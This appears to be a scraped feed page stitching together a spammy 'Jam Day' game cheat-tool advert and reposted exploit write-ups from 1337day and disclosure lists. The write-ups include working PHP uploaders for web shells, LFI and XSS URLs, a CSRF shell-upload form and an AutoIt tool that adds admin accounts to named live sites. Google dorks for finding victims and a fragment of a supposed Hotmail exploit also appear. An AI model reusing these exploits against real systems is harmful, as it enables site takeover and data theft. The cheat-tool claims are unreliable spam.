Check Jam Day Hack Proof and How to use About Jam Day Hack Cheat Tool Our Jam Day Hack Cheat Tool let you add Unlimited Lollipops directly to your account when you want, without being difficult. This Hack Tool is using the best exploits and cannot be detected by game developers. You can use the application for Facebook, Android or iOS if the game is released on those. Upgrade all the premium item as fast as you want by adding as much Lollipops as you want. Jam Day Hack Cheat Tool is the best tool there is to add premium items in your Jam Day account, ejoying every single piece of it. You will play more relaxed and without having to worry about loosing time and nerves because some things require special money to be bought. Our Cheats and Hacks for Jam Day are completely free to download from Zippyshare of MEGA. You can start using it right after you download it. Take it for a test and see how powerfull this Jam Day Hack Cheat Tool is.   Jam Day Hack Cheat Tool Features –Unlimited Lollipops -Android/iOS Operating System Supported -Every Browser Supported -Windows Vista/7/8 Supported -Free to use for limited time -Free check for new updates -Tested every day for bugs and glitches   How to use Jam Day Hack Cheat Tool 1. Download the program from the link bellow 2. Open your game in your browser/device and let it run. Also connect usb cable to your device if you’re using mobile devices. […]

The post Jam Day Hack Cheat Tool appeared first on Free Hack Tools, Cheats and Online Generators.


          Joomla Component com_performs component arbitary file upload   
# Exploit Title: [Joomla Com_performs component arbitary file upload]
# Google Dork: inurl:index.php?option=com_performs upload cv
# Date: [2012-09-27]
# Exploit Author: [Mormoroth]
# Vendor Homepage: [http://www.performs.org.au/]
# Version: [2.4 and prior]
# Tested on: [Linux/Windows]
------------
Attacker can upload files with uploader form
 
uploaded files go to /joomlaPath/media/uploads
 
this form builder rename uploaded file with simple combinition between date and time
 
for example if you upload file it will renamed to >> 2012-09-28-20-05-Unknown-file.txt
 
[2012-09-28] its current date and [20-05] is time of uploading file (Hour/Minute) And [Unknown] never change,after them your file name
 
by simple brute force you can find upload time which is hard part of guessing your exact uploaded file
------------
 
From Iran
 
# 619EDDF21B6569C0   1337day.com [2013-09-01]   7FA32A6DFA150769 #

          Microsoft Hotmail or Outlook 0day exploit by squirrel sploit   
/*
Caution should read this :
To exploit this vulnerability you must Download Squirrel-sploit.
*/
#include <stdio.h>
#include <iostream>
#include <windows.h>
#include <winsock.h>
#include <string>
#include <direct.h>
#pragma comment(lib, "wsock32.lib")
using namespace std;
#define SERVER_PORT 80
void header();
int createConnection(string targetAddr, int targetPort);
int sendTransmission(string message);
string recvTransmission();
void cleanUp();
WORD sockVersion;
WSADATA wsaData;
int sock;
struct sockaddr_in rserver;

   
 
###########################################################################
 
   
===[ Exploit ]===
 
 
  [»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp
 
  [»] asp renamed via the .asp;.jpg (shell.asp;.jpg)

===[ Upload To ]===

  [»] http://server/read_write/file/[Shell]

  [»] http://server/public/File/[Shell]



          MM Forms Community Arbitrary File Upload Vulnerability   

##################################################
# Description : Wordpress Plugins - MM Forms Community Arbitrary File
Upload Vulnerability
# Version : 2.2.5 - 2.2.6
# Link : http://wordpress.org/extend/plugins/mm-forms-community/
# Plugins : http://downloads.wordpress.org/plugin/mm-forms-community.zip
# Date : 24-05-2012
# Google Dork : inurl:/wp-content/plugins/mm-forms-community/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.exemple.com/wordpress/wp-content/plugins/mm-forms-community/upload/temp/
Filename : $postResult output

lo.php
<?php
phpinfo();
?>


          CMS von artmedic webdesign [LFI]   

+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : CMS von artmedic webdesign [LFI]
# Date          : 26-02-2012
# Author        : TeaM MosTa
# Version       : All
# Download      : http://www.artmedic.de/
# Tested on     : Window 7 , B-T.5
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[ Exploit by TeaM MosTa ]--------------------------------------------------+
Exploit
http://127.0.0.1//index.php?page=[LFI]
Demo :
http://www.gabor-event-world.de/index.php?page=/etc/passwd
sendmail:x:100:100:Mailer Daemon:/var/spool/mqueue:/bin/false httpd:x:1000:1100:
Web Server:/tmp:/bin/false webcockpit:x:32541:1101:#32541:
/home/strato/www/we/www.webcockpit.de:/bin/false mysql:x:1104:1104:
MySQL:/home/strato/mysql:/bin/tcsh
+----------------------------------------------------------------------------------------------------------------------------------+
TnKs To :
[# Ked Ans | 1337day | Original MosTa | TrOoN | HacKer_Fire | HacKer_1420 |#]
[# Kàràm Eddiñé BiLàmi | security-ray | Exploit-Db | metasploit | backtrack| walid_rires|#]
[#Mail: team-mosta@hotmail.fr #]



# 4E87C918D474C99C   1337day.com [2013-04-15]   58715734BAFF11B8 #


          Joomla ( com_invest ) LFI vuln   

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Caddy-dz member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

####
# Exploit Title: Joomla Component com_invest LFI Vulnerability
# Author: Caddy-Dz
# Facebook Page: http://www.facebook.com/ALG.Cyber.Army
# E-mail: islam_babia@hotmail.com
# Category:: webapps
# Plugin: http://software.skuzet.nl/component/option,com_phocadownload/Itemid,3/id,7/view,category/
# Google Dork: [inurl:index.php?option=com_invest controller=]
# Security Risk: medium
# Tested on: Windows Seven Edition Integral / French
####

# Sp Greetz To 1337day Team
 

[*] Vulnerable Code :

// get controller
if ($controller = JRequest::getVar('view')) {
        $path = JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php';
        if (file_exists($path)) {
                require_once($path);
        } else {
                JError::raiseError(JText::_('unknown controller'));
        }
       
       
[*] Exploit :

http://127.0.0.1/joomla/index.php?com_invest&controller=../../../../../../../../../proc/self/environ

          dt-chocolate ( exploit )   

Hello list!

I want to warn you about multiple vulnerabilities in Chocolate WP theme for
WordPress. This is commercial theme for WP.

These are Cross-Site Scripting, Full path disclosure, Abuse of
Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.

In 2011 I wrote about Cross-Site Scripting (WASC-08), Full path disclosure
(WASC-13), Abuse of Functionality (WASC-42) and Denial of Service (WASC-10)
vulnerabilities in TimThumb and multiple themes for WordPress
(http://websecurity.com.ua/4910/), and later also was disclosed Arbitrary
File Uploading (WASC-31) vulnerability. In previous years I've wrote about
multiple vulnerabilities in 145 WP themes (http://websecurity.com.ua/4915/)
and here is another theme.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Chocolate WP theme for WordPress. Earlier
I've informed developers about these vulnerabilities.

----------
Details:
----------

XSS (WASC-08) (in older versions of TimThumb):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3C111

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1&w=1111111

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com&h=1&w=1
(bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1
(bypass of restriction on domain, if such restriction is turned on)

About such Abuse of Functionality and Denial of Service vulnerabilities you
can read in my article Using of the sites for attacks on other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/

Besides index.php there are also potentially FPD in other php-files of this
theme.

          ( Flex File Manager ) Shell Upload Vulnerability   

====================================================
 ( Flex File Manager ) Shell Upload Vulnerability
====================================================

#  ( Flex File Manager ) Shell Upload Vulnerability
 
 
# Author: Mr.MLL
# Published: 2010-04-19
# Verified: yes
# Download Exploit Code
# Download N/A
 
=========
 
 
 
# Software :  http://www.castlesblog.com/public/flexfm.zip
# Vendor   :  http://www.castlesblog.com/
# Contact  :  Y-3@hotmail.com
# Home     :  http://sec-r1z.com/
 
 
=========
 
[~] Exploit
 
    http://localhost/flexfm/


[~] expl0it: Your Shell shell.php.jpg or shell.php  And Upload Site.  And  go to


     
[~] http://localhost/flexfm/data/  shell name


          KindEditor (Upload File)   

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : KindEditor (v.3.x->4.1.5) <= File/Shell Upload Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# TwiTter : @kedans
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : php - remote - Multiple
# Type : php - proof of concept - webapp 0day
# Tested on : Windows7
# Download : [http://code.google.com/p/kindeditor/downloads/detail?name=kindeditor-4.1.5.zip]
# Vendor : [http://www.kindsoft.net/]
###

# <3 <3 Greetings t0 Palestine <3 <3
# F-ck HaCking, Lov3 Explo8ting !

######## [ Proof / Exploit ] ################|=>

# Description :
---------------
- This bug in ( KindEditor ) you can upload remote files ( .txt .html ...etc )
with multiple JSON upload langs type ( PHP / ASP / JSP / ASP.NET )
this bug found in old versions by some author , but is still work is latest version .

- Latest V. is ( 4.1.5 ) , Released on ( Jan 19, 2013 )

- old poc : (http://www.devilscafe.in/2012/01/kindedior-remote-file-upload-exploit.html)

# Google Dork :
---------------
 allinurl:/examples/uploadbutton.html
 allinurl:/php/upload_json.php / .asp / .jsp

# KindEditor PHP_JSON Uploader
------------------------------

<?php

$uploadfile="KedAns.txt";
$ch = curl_init("http://[Target]/[path]/kindeditor/php/upload_json.php?dir=file");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array('imgFile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

# KindEditor (ASP,ASP.NET,JSP,PHP) _JSON Uploader :
--------------------------------------------------

- Change the Uploader by ( LANG / PATH ) and use this HTML Uploader

/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php

<html><head>
<title>Uploader By KedAns-Dz</title>
<script src="http://[Target]/kindeditor/kindeditor-min.js"></script>
<script>
KindEditor.ready(function(K) {
var uploadbutton = K.uploadbutton({
button : K('#uploadButton')[0],
fieldName : 'imgFile',
url : 'http://[Target]/kindeditor/php/upload_json.asp?dir=file',
afterUpload : function(data) {
if (data.error === 0) {
var url = K.formatUrl(data.url, 'absolute');
K('#url').val(url);}
},
});
uploadbutton.fileBox.change(function(e) {
uploadbutton.submit();
});
});
</script></head><body>
<div class="upload">
<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
<input type="button" id="uploadButton" value="Upload" />
</div>
</body>
</html>

          Wordpress Plugin Sexy Add Template   

 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0          _                   __           __       __                         1
 1        /' \            __  /'__`\        /\ \__  /'__`\                       0
 0       /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___               1
 1       \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\              0
 0          \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/               1
 1           \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\               0
 0            \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/               1
 1                       \ \____/ >> Exploit database separated by exploit       0
 0                        \/___/          type (local, remote, DoS, etc.)        1
 1                                                                               0
 0       [x] Official Website: http://www.1337day.com                            1
 1       [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                      0
 0                                                                               1
 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0
 0                  I'm NuxbieCyber Member From Inj3ct0r TEAM                    1
 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 |||   Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability    |||
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 ./Title Exploit : Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability
 ./Link Download : http://wordpress.org/extend/plugins/sexy-add-template/
 ./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ]
 ./Security Risk : [ Critical Level ]
 ./Category XPL  : [ WebApps/ZeroDay ]
 ./Tested On     : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
 ./Time & Date   : September, 22 2012. 10:27 AM. Jakarta, Indonesia.
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 |||                        -=[ Use It At Your Risk ]=-                        |||
 |||               This Was Written For Educational Purpos Only                |||
 |||               Author Will Be Not Responsible For Any Damage               |||
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

 #################################################################################
 #
 # [ Information Details ]
 # - Wordpress Plugin Sexy Add Template:
 # Attacker allow CSRF Upload Shell.
 # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce".
 #
 # <html>
 # <head>
 # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title>
 # </head>
 # <body onload="document.form0.submit();">
 # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" >
 # <input type="hidden" name="newfile" value="yes" />
 # <input type="hidden" type="text" value="shell.php" name="AM_filename">
 # <textarea type="hidden" name="AM_file_content">
 # [ Your Script Backdoor/Shell ]
 # </textarea>
 # </form>
 # </body>
 # </html>
 #
 # - Access Shell:
 # http://localhost/wp-content/themes/[theme-name]/shell.php

          Joomla (webotima shell upload vuln)   

#cs
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm AkaStep member from Inj3ct0r Team                  1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

weboptima_cms_remote_add_admin_shell_upload.au3
Video: http://www.youtube.com/watch?v=2Cm9hNR3dNc&feature=youtu.be
============================================
Vulnerable Software: Weboptima CMS
Vendor: http://weboptima.am/
Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN.
Both Exploits are available(HTML exploit to upload shell)
And Autoit Exploit to add arbitrary admin accounts to target site.
More detailts below.
============================================

Few DEMOS:
http://navasards.am
http://olivergroup.am
http://iom.am
http://bluefly.am
http://invest-in-armenia.com
http://decart.am
http://armgeokart.am/

============================================
About Vulns:

1'ST vulnerability is REMOTE SHELL UPLOAD:
Any *UNAUTHENTICATED* USER CAN UPLOAD SHELL.
Vulnerable code:

//cms/upload.php
=============SNIP BEGINS======================
<?php
  $path="../uploades";
if(!file_exists($path))
{
mkdir($path, 0777);
}

if(isset($_GET['name']))
{
unlink($path."/".$_GET['name']);
$letter = $_GET['letter'];
$selTypey = $_GET['selType'];
header("Location: upload.php?letter=$letter&selType=$selTypey");
}
?>
<?php include_once("start.php"); ?>
    <div align="center">
    <table align="center">
    <tr>
        <td colspan="3" align="center"><span class="title">ФїЦЃХѕХЎХ® Ц†ХЎХµХ¬ХҐЦЂ</span></td>
        </tr>
        <tr>
<td>
<?php
if(isset($_POST['sub']))
{
$fileName = $_FILES["up_file"]['name'];
$masSimbl = array('&','%','#');
if(in_array($fileName[0], $masSimbl))
{
echo $fileName[0].' ХЅХ«ХґХѕХёХ¬ХёХѕ ХЅХЇХЅХѕХёХІ ХЎХ¶ХёЦ‚Х¶ Х№ХЁХ¶ХїЦЂХҐХ¬';
}
else
{
move_uploaded_file($_FILES["up_file"]['tmp_name'],"$path/".$_FILES["up_file"]['name']);
}
}
?>
========================SNIP ENDS=================




Simple HTML exploit to upload your shell:

<form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data">
<input type="file"   name="up_file" />&nbsp;&nbsp;<input type="submit" class="button" name="sub" value="send"></form>

After Successfully shell upload your shell can be found: http://site.tld/uploades/shellname.php

NOTE: There may be simple .htaccess to prevent you from accessing shell(HTTP 403).
This is not problem just upload your shell like:

myshell.PhP
or
myshell.pHp

OWNED.



2'nd vulnerability is: REMOTE ADD ADMIN
Any *UNAUTHENTICATED* USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO TARGET SITE.
Vulnerable Code:
//cms/loginPass.php
Notice: header() without exit;*Script continues it's execution.*
==================SNIP BEGINS=========
<?php
session_start();
if($_SESSION['status_shoping_adm']!="adm_shop") {
header("Location: index.php");
}
require_once('../myClass/DatabaseManeger.php');
require_once("../myClass/function.php");

$_POST = stripSlash($_POST);
$_GET = stripSlash($_GET);
?>
<?php
$error = "";
//And more stuff
==================SNIP ENDS=============

And here is exploit written in Autoit to exploit
this vulnerability and add admin to target site.


Exploit usage(CLI):

weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere


##############################################################
Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: weboptima.exe http://site.tld  username  password
[*]      DON'T HATE THE HACKER, HATE YOUR OWN CODE!      [*]
[@@@]           Vuln & Exploit By AkaStep               [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]

##################################################
Trying to add new admin:
To Site:www.decart.am
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
##################################################

##################################################
Exploit Try Count:1
##################################################
Error Count:0
##################################################

##################################################
Exploit Try Count:2
##################################################
Error Count:0
##################################################
Count of errors during exploitation : 0

##################################################
[*] Yaaaaa We are Going To Travel xD           [*]
Try to login @
Site: decart.am/cms/index.php
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
*NOTE* Make Sure Your Browser Reveals HTTP REFERER!
   OTHERWISE YOU WILL UNABLE TO LOGIN!
##################################################
[*] Exit [*]
##################################################


#ce
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF  & _
'Usage: ' & @ScriptName &  ' http://site.tld ' & ' username  ' & 'password ' & _
@CRLF & "[*]      DON'T HATE THE HACKER, HATE YOUR OWN CODE!      [*]" & @CRLF & _
'[@@@]           Vuln & Exploit By AkaStep               [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST';
$vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1);
Global $count=0,$error=0;
$cmsindent='kcaptcha'; # We will use it to identify CMS #;
$adminpanel='/cms/index.php';

;#~  Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName &  ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF
if  $CmdLine[0] <> 3 Then
MsgBox(64,"",$msg_usage);
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
exit;
EndIf


if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf



if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
ConsoleWrite('Are you kidding me?');
Exit;
EndIf


HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
Exit;
EndIf


ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));



HttpSetUserAgent($useragent);
$sidentify=_INetGetSource($targetsite & $adminpanel,True);




if StringInStr($sidentify,$cmsindent) Then
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
$error+=1;
EndIf




$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')


priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~#

Func priv8($targetsite,$username,$password,$count,$error)


$count+=1;~ #~ We are not going to exploit in infinitive manner xD #~;


Global $sAddress = $targetsite

$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF &  'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password &  $triptrop;
if $count <=1 then ConsoleWrite($whatcurrentlywedo)

$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop;
ConsoleWrite($doitnicely);
Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New";


if $error>=2 OR $count>=2 Then
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)

if int($error)=0 then
ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD           [*]' & _
@CRLF & 'Try to login @ '  & @CRLF  & _
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: '  & _
$username & @CRLF & 'With Password: ' & $password & @CRLF & _
'*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _
'   OTHERWISE YOU WILL UNABLE TO LOGIN!   ' & $triptrop & '[*] Exit [*]' & $triptrop);
exit;
Else

ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed?   [*]' & @CRLF & _
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
'[*]  May be you are Lucky;)                   [*]' & _
@CRLF & 'Try to login @ '  & @CRLF  & _
'Site: ' & $targetsite & $adminpanel & @CRLF & _
'With Username: '  & $username & @CRLF & 'With Password: ' & $password &  $triptrop & '[*] Exit [*]' & $triptrop);

EndIf
exit;

EndIf



Global $hOpen = _WinHttpOpen($useragent);
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
_WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #;
_WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~;
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
_WinHttpSendRequest($hRequest, -1, $sPostData)
_WinHttpReceiveResponse($hRequest)

Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
    $sHeader = _WinHttpQueryHeaders($hRequest)
    Do
        $sReturned &= _WinHttpReadData($hRequest)
    Until @error

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(Random(10000,20000,1));
priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~;

Else
$error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#;

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(Random(10000,20000,1));
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#

EndIf

EndFunc;=> priv8();


#cs

          Uploader Arbitrary File Upload Vulnerability   

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
